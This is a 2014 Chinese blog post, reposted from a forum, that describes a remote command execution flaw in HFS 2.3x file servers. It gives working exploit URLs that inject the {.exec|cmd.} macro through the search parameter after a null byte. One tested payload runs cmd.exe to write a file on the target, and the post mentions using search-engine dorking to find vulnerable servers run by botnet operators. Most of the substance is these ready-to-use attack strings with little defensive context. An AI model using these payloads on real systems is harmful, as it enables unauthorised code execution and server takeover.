黑客抓鸡末日(HFS 2.3x 远程命令执行漏洞)

8,850次阅读
没有评论

共计 299 个字符,预计需要花费 1 分钟才能阅读完成。

从某论坛看见的,转载部分: 
这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。 

http://localhost:80/?search==%00{.exec|cmd.} 

http://localhost:80/search=%00{.exec|cmd.} 

注:有些版本search前面是没有?的。 

测试部分: 
百度搜HFS默认就是2.3x版本,执行echo测试成功: 
http://localhost:8080/?search==%00{.exec|cmd.exe%20/c%20echo>c:/1.txt%20123.} 
google hack了一下,发现一个抓鸡黑阔:

黑客抓鸡末日(HFS 2.3x 远程命令执行漏洞)

黑客抓鸡末日(HFS 2.3x 远程命令执行漏洞)

已测试官方最新版,一样存在。

黑客抓鸡末日(HFS 2.3x 远程命令执行漏洞)

黑客抓鸡末日(HFS 2.3x 远程命令执行漏洞)


正文完
HFS 抓肉鸡 抓鸡黑阔 黑阔
发表至: 其他资源
2014-10-25
 0
admin
版权声明:本站原创文章,由 admin 于2014-10-25发表,共计299字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
联想电脑再次被曝存在重大安全漏洞
港囧(2015)
内核模式漏洞的开始 Win64bit提权0day漏洞(CVE-2014-4113)
谷歌模块化智能手机年底测试 敲定波多黎各
评论(没有评论)
验证码
文章搜索
一言一句话
-「
标签云
.net0day12306360360不正当竞争360安全卫士3GAcrobat X ProAcrylicadminAdobeAdobe IllustratorADsafeALGORITHMAndroidAndroid KillerAndroid逆向AndroratAPI函数ApkIDEAppleaspx提权Assist.XAvastA记录BandicamBioreactor DesignBurp SuiteC++CADCCNACCNA学习指南CCNPChappieChrChrWCISCOClassWizardCMS识别cookie劫持CS6CTB-LockerCVE-2014-9222D3D游戏DarkShellDDOSDecompilerDirectXDiscuzDLL编程